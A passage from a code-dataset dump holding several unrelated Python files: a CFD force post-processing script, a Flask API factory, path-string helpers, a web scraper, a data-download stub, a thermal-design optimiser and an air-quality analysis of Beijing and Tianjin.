usecols=[3]) # viscous force x-axis for left cylinder\n\nFpx_right = np.loadtxt('TwoOscillatingCylinders_pb_Force_pression.out', unpack=True, usecols=[5]) # pressure x-axis for right cylinder\nFvx_right = np.loadtxt('TwoOscillatingCylinders_pb_Contrainte_visqueuse.out', unpack=True, usecols=[5]) # viscous force x-axis for right cylinder\n\nFx_left = Fvx_left + Fpx_left # total fluid force x-axis for left cylinder\nFx_right = Fvx_right + Fpx_right # total fluid force x-axis for right cylinder\n\n\nFx_left_adim = Fx_left / (rho*R1**2.*u*Omega**2.) # total dimensionless fluid force x-axis for left cylinder\nFx_right_adim = Fx_right / (rho*R1**2.*u*Omega**2.) # total dimensionless fluid force x-axis for right cylinder\n\nDataOut_left = np.column_stack((t_adim,Fx_left_adim))\nnp.savetxt('Numerical_force_left.txt', DataOut_left) #self\n\nDataOut_right = np.column_stack((t_adim,Fx_right_adim))\nnp.savetxt('Numerical_force_right.txt', DataOut_right) # cross\n\n# Determining m_self, m_cross, c_cross and c_self (numerically)\n# Fourier's inner product : = (2/5T) * integral from 0 to 5T f(t)*g(t) dt\n# m_self_x = (2/5T) * integral from 0 to 5T sin(Omega*t) Fx_right(t) dt/rho*pi*R1^2*u*Omega^2\n\nm_self_x = 2./5./T*np.trapz(np.sin(Omega*t)*Fx_right,t)/(rho*np.pi*R1**2.*u*Omega**2.) \nc_self_x = -2./5./T*np.trapz(np.cos(Omega*t)*Fx_right,t)/(rho*np.pi*R1**2.*u*Omega**2.) \nm_cross_x = 2./5./T*np.trapz(np.sin(Omega*t)*Fx_left,t)/(rho*np.pi*R1**2.*u*Omega**2.) \nc_cross_x = -2./5./T*np.trapz(np.cos(Omega*t)*Fx_left,t)/(rho*np.pi*R1**2.*u*Omega**2.) \n\nDataOut1 = np.column_stack((m_self_x,c_self_x, m_cross_x, c_cross_x))\nnp.savetxt('Numerical_coefficients.txt', DataOut1)\n\n# Theory \n\n\nJCP_m_self = 1.10\nLS_m_self = 1.11\nCOL_m_self = 1.11\n\nJCP_c_self = 0.117\nLS_c_self = 0.105\nCOL_c_self = 0.106\n\nJCP_m_cross = -0.116\nLS_m_cross = -0.138\nCOL_m_cross = -0.138\n\nJCP_c_cross = -0.0135\nLS_c_cross = -0.0132\nCOL_c_cross = -0.0136\n\nDataOut2 = np.column_stack((COL_m_self,COL_c_self, COL_m_cross, COL_c_cross))\nnp.savetxt('COL_coefficients.txt', DataOut2)\nDataOut3 = np.column_stack((LS_m_self,LS_c_self, LS_m_cross, LS_c_cross))\nnp.savetxt('LS_coefficients.txt', DataOut3)\n\nFx_left_adim_LS = (LS_m_cross*np.sin(t_adim)-LS_c_cross*np.cos(t_adim))*np.pi\nFx_right_adim_LS = (LS_m_self*np.sin(t_adim)-LS_c_self*np.cos(t_adim))*np.pi\n\nDataOut_left_LS = np.column_stack((t_adim,Fx_left_adim_LS))\nnp.savetxt('LS_force_left.txt', DataOut_left_LS)\nDataOut_right_LS = np.column_stack((t_adim,Fx_right_adim_LS))\nnp.savetxt('LS_force_right.txt', DataOut_right_LS)\n\nFx_left_adim_COL = (COL_m_cross*np.sin(t_adim)-COL_c_cross*np.cos(t_adim))*np.pi\nFx_right_adim_COL = (COL_m_self*np.sin(t_adim)-COL_c_self*np.cos(t_adim))*np.pi\n\nDataOut_left_COL = np.column_stack((t_adim,Fx_left_adim_COL))\nnp.savetxt('COL_force_left.txt', DataOut_left_COL)\nDataOut_right_COL = np.column_stack((t_adim,Fx_right_adim_COL))\nnp.savetxt('COL_force_right.txt', DataOut_right_COL)\n","repo_name":"cea-trust-platform/TrioCFD-code","sub_path":"share/Validation/Rapports_automatiques/Fluid_Structure_Interaction/TwoOscillatingCylindersALE/src/ForceNum.py","file_name":"ForceNum.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"9788830218","text":"\"\"\"\n marvin\n ~~~~~~\n\n This is the main entry point to marvin, the API endpoints for streamr.\n\"\"\"\n\n# pylint: disable=invalid-name,superfluous-parens\nfrom . import utils\nfrom .security import before_request_authentication\n\nfrom celery import Celery\nfrom flask import Flask\nfrom flask.ext.principal import Principal\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom logging import getLogger\nfrom sqlalchemy_defaults import make_lazy_configured\nfrom os import path, environ\n\nimport logging.config\nimport sqlalchemy\nimport yaml\n\n\napi = utils.ApiBase()\ndb = SQLAlchemy()\nprincipal = Principal()\n\n_logger = getLogger('marvin')\n\n\ndef create_app(config_file=None, **extra_config):\n \"\"\" Creates a WSGI app.\n\n :param config_file: Load config from this file.\n :param extra_config: Extra configuration values to pass to the WSGI object.\n \"\"\"\n app = Flask(__name__)\n\n _configure_app(app, config_file, **extra_config)\n _configure_logging(app)\n _connect_extensions(app)\n\n # Configure lazy models\n make_lazy_configured(sqlalchemy.orm.mapper)\n\n _connect_blueprints(app)\n _connect_api_endpoints()\n _connect_utilities(app)\n\n # Import modules that connect to signals\n from . import permissions as _\n\n return app\n\n\ndef _configure_app(app, config_file=None, **extra_config):\n # Load the core settings\n core_settings = path.abspath(path.join(path.dirname(__file__), 'settings.py'))\n app.config.from_pyfile(core_settings)\n\n # Load from specified config file\n if config_file is not None:\n app.config.from_pyfile(config_file)\n\n # Load from environment specified config\n if 'MARVIN_CONFIG_FILE' in environ:\n print(\"Loading config from %s...\" % environ['MARVIN_CONFIG_FILE'])\n app.config.from_envvar('MARVIN_CONFIG_FILE')\n\n # Override with any kwargs given\n app.config.update(extra_config)\n\n\ndef _configure_logging(app):\n \"\"\" Configures log handlers for the app, if necessary. Log config can be ignored if TESTING=True or DEBUG=True. \"\"\"\n log_conf_path = app.config.get('LOG_CONF_PATH')\n if log_conf_path:\n print(\"Loading log config from %s\" % log_conf_path)\n _init_logging(log_conf_path)\n else:\n ignore_absent_logging = app.config.get('DEBUG') or app.config.get('TESTING')\n if not ignore_absent_logging:\n raise ValueError('ERROR: LOG_CONF_PATH not found in config, terminating.')\n\n\ndef _connect_extensions(app):\n db.init_app(app)\n api.init_app(app)\n principal.init_app(app)\n\n\ndef _connect_blueprints(app):\n # Import views (must be done down here to avoid circular imports)\n from .views import stats\n from .views import promo\n\n app.register_blueprint(stats.mod)\n app.register_blueprint(promo.mod)\n\n\ndef _connect_api_endpoints():\n # Import views (must be done down here to avoid circular imports)\n from .views import movies\n from .views import streams\n from .views import entries\n from .views import users\n\n api.add_resource(movies.AllMoviesView, '/movies')\n api.add_resource(movies.MovieDetailView, '/movies/')\n api.add_resource(streams.CreateStreamView, '/movies//createStream')\n api.add_resource(streams.StreamDetailView, '/streams/')\n api.add_resource(streams.StreamEntryView, '/streams//entries')\n api.add_resource(streams.PublishStreamView, '/streams//publish')\n api.add_resource(streams.UnpublishStreamView, '/streams//unpublish')\n api.add_resource(entries.CreateEntryView, '/streams//createEntry')\n api.add_resource(entries.EntryDetailView, '/entries/')\n api.add_resource(users.CreateUserView, '/users')\n api.add_resource(users.UserDetailView, '/users/')\n api.add_resource(users.LoginView, '/login')\n\n\ndef _connect_utilities(app):\n # Error handler\n app.register_error_handler(500, utils.error_handler)\n\n # Connect before and after request handlers\n app.before_request(before_request_authentication)\n app.teardown_appcontext(utils.teardown_appcontext)\n\n\ndef _init_logging(log_conf_path):\n \"\"\" Configure logging with the config given. \"\"\"\n with open(log_conf_path) as log_conf_file:\n log_conf = yaml.load(log_conf_file)\n logging.config.dictConfig(log_conf)\n\n\ndef make_celery():\n \"\"\" Creates a celery object.\n\n Requires that create_app() can be called without arguments, so MARVIN_CONFIG_FILE should\n probably point to the config file you want to use.\n \"\"\"\n app = create_app()\n celery = Celery(app.import_name, broker=app.config['CELERY_BROKER_URL'])\n celery.conf.update(app.config)\n TaskBase = celery.Task\n class ContextTask(TaskBase):\n \"\"\" Wraps the base task to make sure it's run in an app context. \"\"\"\n\n abstract = True\n\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n celery.Task = ContextTask\n return celery\n","repo_name":"streamr/marvin","sub_path":"marvin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1838061720","text":"from .stringMethods import replaceAll, camelToSnake, snakeToCamel, toVariableName\r\nfrom typing import Literal\r\n\r\nSPLITCHAR = '/'\r\nSINGLE_LEVEL_WILDCARD = '+'\r\nMULTI_LEVEL_WILDCARD = '#'\r\n\r\n\r\ndef pathToSnakeCase(path: str, splitchar=SPLITCHAR) -> str:\r\n # Join the splitchar with the adapted strings.\r\n return splitchar.join(\r\n map(\r\n lambda item: camelToSnake(item),\r\n path.split(splitchar)\r\n )\r\n )\r\n\r\n\r\ndef pathToCamelCase(path: str, splitchar=SPLITCHAR) -> str:\r\n # Join the splitchar with the adapted strings.\r\n return splitchar.join(\r\n map(\r\n lambda item: snakeToCamel(item),\r\n path.split(splitchar)\r\n )\r\n )\r\n\r\n\r\ndef convertPath(path: str) -> str:\r\n \"\"\" converts the path\r\n\r\n Args:\r\n path (str): The Path to adapt.\r\n\r\n Returns:\r\n str: The adapted Path\r\n \"\"\"\r\n return replaceAll(path, ['.', '[', [']', '']], SPLITCHAR)\r\n\r\n\r\ndef _isNumber(item: str) -> bool:\r\n try:\r\n float(item)\r\n return True\r\n except BaseException:\r\n return False\r\n\r\n\r\ndef toPythonPath(path: str, style: Literal[\"dot\", \"bracket\"] = \"dot\") -> str:\r\n \"\"\" converts the nope-path to a python path.\r\n\r\n Args:\r\n path (str): The Path to adapt.\r\n style (Literal[\"dot\",\"bracket\"], optional): The access-style (bracket or dotted.). Defaults to \"dot\".\r\n\r\n Returns:\r\n str: The adapted Path\r\n \"\"\"\r\n\r\n ret = \"\"\r\n splitted = path.split(SPLITCHAR)\r\n\r\n for item in splitted:\r\n if len(ret) > 0:\r\n if _isNumber(ret):\r\n ret += f\"[{item}]\"\r\n elif style == \"dot\":\r\n ret += \".\" + item\r\n else:\r\n ret += f\"[{item}]\"\r\n else:\r\n ret = item\r\n return ret\r\n\r\n\r\ndef containsWildcards(str: str) -> bool:\r\n \"\"\" Determines, whether the given string contains a single level card or not.\r\n\r\n Args:\r\n str (str): String to check\r\n\r\n Returns:\r\n bool: Result\r\n \"\"\"\r\n return SINGLE_LEVEL_WILDCARD in str or MULTI_LEVEL_WILDCARD in str\r\n\r\n\r\ndef getLeastCommonPathSegment(\r\n pathes, considerSingleLevel=False, considerMultiLevel=False):\r\n \"\"\" Returns the least common segmet of all pathes, included in the pathes array.\r\n\r\n Args:\r\n pathes (str[]): The Segments to compare.\r\n considerSingleLevel (bool): allows \"singlelevel\"-wildcards in the segments\r\n considerMultiLevel (bool): allows \"multilevel\"-wildcards in the segments\r\n\r\n Returns:\r\n (False | str): the least common segment of the pathes or False.\r\n \"\"\"\r\n current_path = pathes.pop()\r\n while len(pathes) > 0:\r\n next = pathes.pop()\r\n current_path = _getLeastCommonPathSegment(\r\n current_path, next, considerSingleLevel=considerSingleLevel, considerMultiLevel=considerMultiLevel)\r\n\r\n # Only proceed, if there are elements included.\r\n if not current_path:\r\n # Return False\r\n return current_path\r\n\r\n # Return the least common segments.\r\n return current_path\r\n\r\n\r\ndef _getLeastCommonPathSegment(\r\n path01, path02, considerSingleLevel=False, considerMultiLevel=False):\r\n \"\"\"_summary_\r\n\r\n Args:\r\n path01 (_type_): _description_\r\n path02 (_type_): _description_\r\n opts (_type_, optional): _description_. Defaults to dotted_dict({}).\r\n\r\n Returns:\r\n _type_: _description_\r\n \"\"\"\r\n p1 = convertPath(path01).split(SPLITCHAR)\r\n p2 = convertPath(path02).split(SPLITCHAR)\r\n\r\n ret = []\r\n idx = 0\r\n\r\n l1 = len(p1)\r\n l2 = len(p2)\r\n\r\n _max = min(l1, l2)\r\n\r\n while idx < _max:\r\n\r\n if p1[idx] == p2[idx]:\r\n ret += [p1[idx]]\r\n elif considerSingleLevel:\r\n if p1[idx] == SINGLE_LEVEL_WILDCARD:\r\n ret += [p2[idx:]]\r\n elif p2[idx] == SINGLE_LEVEL_WILDCARD:\r\n ret += [p1[idx:]]\r\n else:\r\n break\r\n elif considerMultiLevel:\r\n if p1[idx] == MULTI_LEVEL_WILDCARD:\r\n ret += [p2[idx:]]\r\n break\r\n elif p2[idx] == MULTI_LEVEL_WILDCARD:\r\n ret += [p1[idx:]]\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n idx = idx + 1\r\n if len(ret):\r\n return SPLITCHAR.join(ret)\r\n return False\r\n\r\n\r\ndef patternIsValid(str: str) -> bool:\r\n \"\"\" Function to test if a pattern is valid\r\n\r\n Args:\r\n str (str): The pattern to test\r\n\r\n Returns:\r\n bool: The result.\r\n \"\"\"\r\n\r\n if str == \"\":\r\n return True\r\n\r\n splitted = str.split(SPLITCHAR)\r\n last_index = len(splitted) - 1\r\n\r\n for idx, segment in enumerate(splitted):\r\n if segment:\r\n if segment == MULTI_LEVEL_WILDCARD:\r\n return idx == last_index\r\n else:\r\n return False\r\n\r\n return True\r\n\r\n\r\ndef varifyPath(path: str) -> str:\r\n \"\"\" Start to varify the Path.\r\n\r\n Args:\r\n path (str): The Path to adapt.\r\n\r\n Returns:\r\n str: The item to return\r\n \"\"\"\r\n return SPLITCHAR.join(\r\n map(lambda item: toVariableName(item), path.split(SPLITCHAR)))\r\n","repo_name":"ZeMA-gGmbH/NoPE-PY","sub_path":"nope/helpers/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36660305551","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n# Assuming you have a pandas DataFrame named 'df' with a column 'url'\ndf = pd.read_csv('data/devpost_data_updateClicks.csv') # Load your dataset\n\ndef extract_description(url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, 'html.parser')\n description_element = soup.find(id='challenge-description')\n content = description_element.get_text(strip=True)\n print(content)\n return content if description_element else \"Description not found\"\n except requests.RequestException:\n return \"Failed to retrieve content\"\n\n# Apply the function to each URL in the DataFrame\ndf['description'] = df['url'].apply(extract_description)\n\n# Now df has a new column 'description' with the extracted content\ndf.to_csv('data/devpost_data_update3.csv', index=False)","repo_name":"Chenchuhui/COSI101A-FINAL-Project-RecommendationSystem","sub_path":"processData/extract_description.py","file_name":"extract_description.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21444632441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 10 17:18:15 2020\n\n@author: aidan\n\"\"\"\nimport girder_client\n\nDestination = '/Volumes/Seagate Backup 3/'\nFolder = '553e6db18d777f082b5918eb'\ngc = girder_client.GirderClient(apiUrl='https://data.kitware.com/api/v1')\ngc.authenticate(username='anonymous', interactive=True)\n#gc.inheritAccessControlRecursive(UNC_ScanURL)\n\n#gc.downloadFile(fileId=FileID, path=Destination)\n\n#\n#\n#URL = 'anonymous@data.kitware.com:collection/UNC-Wisconsin\\ Neurodevelopment\\ Rhesus\\ Data/scan_data'","repo_name":"Phenomenal-Cat/MF3D-Tools","sub_path":"MF3D_Blender/MF3D_DownloadUNCdata.py","file_name":"MF3D_DownloadUNCdata.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"26087567208","text":"from pathlib import Path\nimport os\nimport hotstarship\nfrom scipy.optimize import Bounds, NonlinearConstraint, minimize\nimport numpy as np\nimport math\nimport sympy as sp\nfrom sympy import hessian\n\n# Variables\n# 0: t_f: top face sheet thickness [m]\n# 1: t_c: core thickness [m]\n# 2: t_b: bottom face sheet thickness [m]\n# 3: t_w: web thickness [m]\n# 4: Theta: corrugation angle [10^4 °] (for scaling reasons)\n# 5: p: half cell length [m]\nx0 = [2e-3, 50e-3, 2e-3, 2e-3, 0.0045, 50e-3]\n\n# Function tolerance at which to terminate\ntolerance = 1e-6\n\n# Lower and upper bounds\nlb = [0.5e-3, 2e-3, 0.5e-3, 0.5e-3, 10e-4, 3e-3]\nub = [20e-3, 100e-3, 20e-3, 20e-3, 60e-4, 100e-3]\n\n# Constraints\n# 0: back face temperature\n# 1: maximum temperature\nmax_back_T = 373.15\nmax_T = 1000\n\n# Material densities\nrho_sheet = 4420 # for Ti-6Al-4V\nrho_core = 200 # for Pyrogel XTE\n\n\nclass Functions:\n def __init__(self):\n vars = sp.var('t_f t_c t_b t_w Theta p')\n mass = rho_sheet * t_f + \\\n (rho_sheet * t_w + rho_core * (p * sp.sin(sp.rad(Theta * 1e4)) - t_w)) / \\\n (p * sp.sin(sp.rad(Theta * 1e4))) * t_c + \\\n rho_sheet * t_b\n\n # Function\n f = sp.Matrix([mass])\n X = sp.Matrix([t_f, t_c, t_b, t_w, Theta, p])\n self.f_lam = sp.lambdify(vars, f, 'numpy')\n\n # Jacobian\n J = f.jacobian(X)\n self.J_lam = sp.lambdify(vars, J, 'numpy')\n\n # Hessian\n H = hessian(f, vars)\n self.H_lam = sp.lambdify(vars, H, 'numpy')\n\n def J(self, args):\n print(\"Running Jacobian fun with: \" + str(args))\n return self.J_lam(*args)\n\n def H(self, args):\n print(\"Running Hessian fun with: \" + str(args))\n return self.H_lam(*args)\n\n def f(self, args):\n print(\"Running target fun with: \" + str(args))\n mass = self.f_lam(*args)[0][0]\n print(\"Mass is %.2f kg/m^2.\" % mass)\n return mass\n\n\ndef constraint_fun(x):\n print(\"Running constr fun with: \" + str(x))\n\n # Generate input file\n script_dir = os.path.dirname(os.path.realpath(__file__))\n xmldata = Path(script_dir, \"input_Template.xml\").read_text()\n xmldata = xmldata.replace(\"**t_f**\", str(x[0]))\n xmldata = xmldata.replace(\"**firstcell_f**\", str(x[0] / 100))\n xmldata = xmldata.replace(\"**t_c**\", str(x[1]))\n xmldata = xmldata.replace(\"**t_b**\", str(x[2]))\n xmldata = xmldata.replace(\"**t_w**\", str(x[3]))\n xmldata = xmldata.replace(\"**Theta**\", str(x[4] * 1e4))\n xmldata = xmldata.replace(\"**p**\", str(x[5]))\n\n # Save input file\n input_file = Path(script_dir, \"input.xml\")\n with open(input_file, 'w') as xmlfile:\n xmlfile.write(xmldata)\n\n # Generate input arguments\n output_file = str(Path(script_dir, \"output.csv\"))\n args = {\"input_file\": input_file,\n \"output_file\": output_file,\n \"force_write\": True}\n\n # Run Hot-STARSHIP\n valid = hotstarship.hotstarship(args)\n\n # Evaluate constraints\n sr = hotstarship.output.SolutionReader(output_file)\n cons = [max_back_T - sr.get_max_back_T(),\n max_T - sr.get_max_T()]\n\n print(\"Back face temperature constraint: %.2f K difference\" % -cons[0])\n print(\"Max temperature constraint: %.2f K difference\" % -cons[1])\n\n return cons\n\n\nif __name__ == \"__main__\":\n\n # Set up target function, Jacobian and Hessian\n funs = Functions()\n\n # Set bounds for thickness\n bounds = Bounds(lb=lb, ub=ub, keep_feasible=True)\n\n # Set constraints for temperature and remaining thickness\n ineq_cons = {'type': 'ineq', 'fun': constraint_fun}\n\n # Start optimization procedure\n res = minimize(funs.f, x0, jac=funs.J, hess=funs.H, method='SLSQP', constraints=[ineq_cons],\n options={'ftol': tolerance, 'eps': tolerance}, bounds=bounds)\n\n # Print result\n print(res)\n","repo_name":"nilsh7/Hot-STARSHIP","sub_path":"Input/Ti_Optimization_Side/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19963171496","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib\n# 导入csv文件\nfp = pd.read_csv(r'F:\\pythonProject\\空气质量.csv', encoding='gbk')\n# 将北京天津的数据区分开\nfp1 = fp[fp['城市'] == '天津']\nfp2 = fp[fp['城市'] == '北京']\nprint(fp1.info(), fp2.info())\n# 运行结果如下\n'''\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 90 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 NO2 98 non-null int64 \n 6 CO 98 non-null float64\n 7 SO2 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(2), int64(5), object(2)\nmemory usage: 7.0+ KB\n\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 95 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 SO2 98 non-null float64\n 6 NO2 98 non-null float64\n 7 CO 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(3), int64(4), object(2)\nmemory usage: 7.0+ KB\nNone None'''\n# 由此可以看出在质量等级这一列有部分缺失值\n# 查询得到可以通过AQI得到质量等级\n'''0 - 50一级(优);51 -100二级(良);101-150三级(轻度污染);151-200四级(中度污染);201-300五级(重度污染);300+六级(严重污染)'''\n\n\ndef value_change(column1, column2, file):\n file = file.copy()\n # 定义一个数据处理函数,通过column1的值的判断来改变column2的值\n a = 0\n lst = list(file[column1].index)\n # 获取column1 的索引\n for i in file[column1]:\n if (i > 0) and (i <= 50):\n file.loc[lst[a], column2] = '优'\n elif (i >= 51) and (i <= 100):\n file.loc[lst[a], column2] = '良'\n elif (i >= 101) and (i <= 150):\n file.loc[lst[a], column2] = '轻度污染'\n elif (i >= 151) and (i < 200):\n file.loc[lst[a], column2] = '中度污染'\n elif (i >= 201) and (i <= 300):\n file.loc[lst[a], column2] = '重度污染'\n else:\n file.loc[lst[a], column2] = np.nan\n a += 1\n return file\n\n\nfp1 = value_change('AQI', '质量等级', file=fp1)\nfp2 = value_change('AQI', '质量等级', file=fp2)\nprint(fp1.info(), fp2.info())\n'''\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 98 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 NO2 98 non-null int64 \n 6 CO 98 non-null float64\n 7 SO2 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(2), int64(5), object(2)\nmemory usage: 7.0+ KB\n\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 98 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 SO2 98 non-null float64\n 6 NO2 98 non-null float64\n 7 CO 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(3), int64(4), object(2)\nmemory usage: 7.0+ KB\nNone None'''\n# 对质量等级分组\nfp1_group = fp1.groupby(by='质量等级')\nfp2_group = fp1.groupby(by='质量等级')\n# 利用len函数得到九月到十二月七日中各个质量等级对应的天数\nfp1_group_quality = fp1_group.agg(len)\nfp2_group_quality = fp1_group.agg(len)\n# 去除其他列仅保留一列方便自己查看\nfp1_group_quality.drop(fp1_group_quality.iloc[:, 1::], axis=1, inplace=True)\nfp1_group_quality_1 = fp1_group_quality.rename(columns={'日期': '天数'})\nprint(fp1_group_quality_1)\n''' 天数\n质量等级 \n中度污染 3\n优 23\n良 55\n轻度污染 15\n重度污染 1'''\nfp2_group_quality.drop(fp2_group_quality.iloc[:, 1::], axis=1, inplace=True)\nfp2_group_quality_1 = fp2_group_quality.rename(columns={'日期': '天数'})\nprint(fp2_group_quality_1)\n''' 天数\n质量等级 \n中度污染 3\n优 24\n良 55\n轻度污染 15\n重度污染 1\n'''\n\n\ndef lst_va_change(lst):\n first_lst = []\n for i in lst:\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(',', '')\n i = i.replace('\\'', '')\n first_lst.append(i)\n return first_lst\n\n\n# 去除字符串的(,'以求美观\n\n\ndef pie_draw(y, name, file):\n # 设置一个画饼图的函数\n lst = [str(i) for i in file.index]\n label = lst_va_change(lst)\n # 绘图\n plt.pie(x=file[y], labels=label, autopct='%.2f', textprops={'fontsize': '10', 'color': 'k'})\n # 添加标题\n plt.title(name)\n\n\ndef two_pie_draw(y, name1, name2, name3, file1, file2):\n # 设置中文字体\n font = {'family': 'MicroSoft YaHei',\n 'size': '12'}\n matplotlib.rc('font', **font)\n plt.figure(figsize=(20, 8), dpi=80)\n plt.subplot(1, 2, 1)\n pie_draw(y, name1, file1)\n plt.subplot(1, 2, 2)\n pie_draw(y, name2, file2)\n # 保存图片\n plt.savefig(r'C:\\Users\\HP\\Desktop\\{}.png'.format(name3))\n plt.show()\n\n\ntwo_pie_draw('天数', r'天津9/1-12/7空气质量', r'北京9/1-12/7空气质量', '北京天津两市空气质量对比(总)', fp1_group_quality_1,\n fp2_group_quality_1)\n# 为了不改变fp1,fp2将其进行新的赋值\nnew_fp1 = fp1.copy()\nnew_fp2 = fp2.copy()\n# 对new_fp1,new_fp2的日期进行处理方便分组\nnew_fp1['日期'] = new_fp1['日期'].apply(lambda x: x.split('/')[1] + '月')\nnew_fp2['日期'] = new_fp2['日期'].apply(lambda x: x.split('/')[1] + '月')\n# 对日期进行分组\nnew_fp1_group = new_fp1.groupby(by='日期')\nnew_fp2_group = new_fp2.groupby(by='日期')\n# 对数据求平均值\nnew_fp1_group_mean = new_fp1_group.agg('mean')\nnew_fp2_group_mean = new_fp2_group.agg('mean')\n# 利用已设置的函数将AQI变成质量等级\nnew_fp1_group_mean = value_change(column1='AQI', column2='AQI', file=new_fp1_group_mean)\nnew_fp1_group_mean.loc[:, 'sort'] = [2, 3, 4, 1]\nnew_fp1_group_mean = new_fp1_group_mean.sort_values(by='sort')\nprint(new_fp1_group_mean)\n''' AQI PM2.5 PM10 NO2 CO SO2 O3_8h sort\n日期 \n9月 良 55.366667 55.933333 63.600000 46.200000 1.023333 58.733333 1\n10月 良 66.166667 71.666667 66.733333 54.800000 1.000000 55.366667 2\n11月 良 47.366667 87.200000 47.900000 0.910000 9.500000 43.600000 3\n12月 良 63.571429 75.571429 86.571429 64.714286 1.142857 62.000000 4\n'''\nnew_fp2_group_mean = value_change(column1='AQI', column2='AQI', file=new_fp2_group_mean)\nnew_fp2_group_mean.loc[:, 'sort'] = [2, 3, 4, 1]\nnew_fp2_group_mean = new_fp2_group_mean.sort_values(by='sort')\nprint(new_fp2_group_mean)\n''' AQI PM2.5 PM10 SO2 NO2 CO O3_8h sort\n日期 \n9月 良 18.233333 36.200000 2.533333 20.566667 0.630000 98.533333 1\n10月 优 62.774194 66.387097 54.774194 1.000000 56.612903 60.032258 2\n11月 良 44.100000 64.733333 0.643333 2.700000 35.533333 41.700000 3\n12月 优 49.428571 49.285714 74.714286 60.142857 1.385714 48.857143 4\n'''\n# 在此处绘制直方图将天津市PM2.5,PM10,NO2,CO,SO2,O3月平均含量表示出来\n# 设置中文字体\nfont = {'family': 'MicroSoft YaHei',\n 'size': '12'}\nmatplotlib.rc('font', **font)\n# 设置x的刻度\n_x = ['9月', '', '10月', '', '11月', '', '12月']\n# 设置y\ny_pm25 = new_fp1_group_mean['PM2.5']\ny_pm10 = new_fp1_group_mean['PM10']\ny_no2 = new_fp1_group_mean['NO2']\ny_co = new_fp1_group_mean['CO']\ny_so2 = new_fp1_group_mean['SO2']\ny_o3 = new_fp1_group_mean['O3_8h']\n\ny2_pm25 = new_fp2_group_mean['PM2.5']\ny2_pm10 = new_fp2_group_mean['PM10']\ny2_no2 = new_fp2_group_mean['NO2']\ny2_co = new_fp2_group_mean['CO']\ny2_so2 = new_fp2_group_mean['SO2']\ny2_o3 = new_fp2_group_mean['O3_8h']\n# 设置图片大小\nplt.figure(figsize=(20, 8), dpi=80)\n# 多次绘图将PM2.5,PM10,NO2,CO,SO2,O3月平均含量均在图中画出来\nplt.bar(range(3, 34, 10), y_co, label='天津', color='g', alpha=0.5)\nplt.bar(range(4, 35, 10), y_so2, color='g', alpha=0.5)\nplt.bar(range(5, 36, 10), y_o3, color='g', alpha=0.5)\nplt.bar(range(6, 37, 10), y_no2, color='g', alpha=0.5)\nplt.bar(range(7, 38, 10), y_pm10, color='g', alpha=0.5)\nplt.bar(range(8, 39, 10), y_pm25, color='g', alpha=0.5)\n\nplt.bar(range(3, 34, 10), y2_co, label='北京', color='y', alpha=0.5)\nplt.bar(range(4, 35, 10), y2_so2, color='y', alpha=0.5)\nplt.bar(range(5, 36, 10), y2_o3, color='y', alpha=0.5)\nplt.bar(range(6, 37, 10), y2_no2, color='y', alpha=0.5)\nplt.bar(range(7, 38, 10), y2_pm10, color='y', alpha=0.5)\nplt.bar(range(8, 39, 10), y2_pm25, color='y', alpha=0.5)\n# 设置xy轴刻度\nplt.xticks(range(5, 36, 5), _x)\nplt.yticks(range(0, 102, 3))\n# 添加描述信息\nplt.xlabel('月份(从左到右依次为CO,SO2,O3,NO2,PM10,PM2.5)')\nplt.ylabel('浓度μg/m3(CO为mg/m3)')\nplt.title('北京天津PM2.5,PM10,NO2,CO,SO2,O3月平均含量')\n# 设置网格\nplt.grid(alpha=0.4)\n# 设置图例\nplt.legend(loc='upper 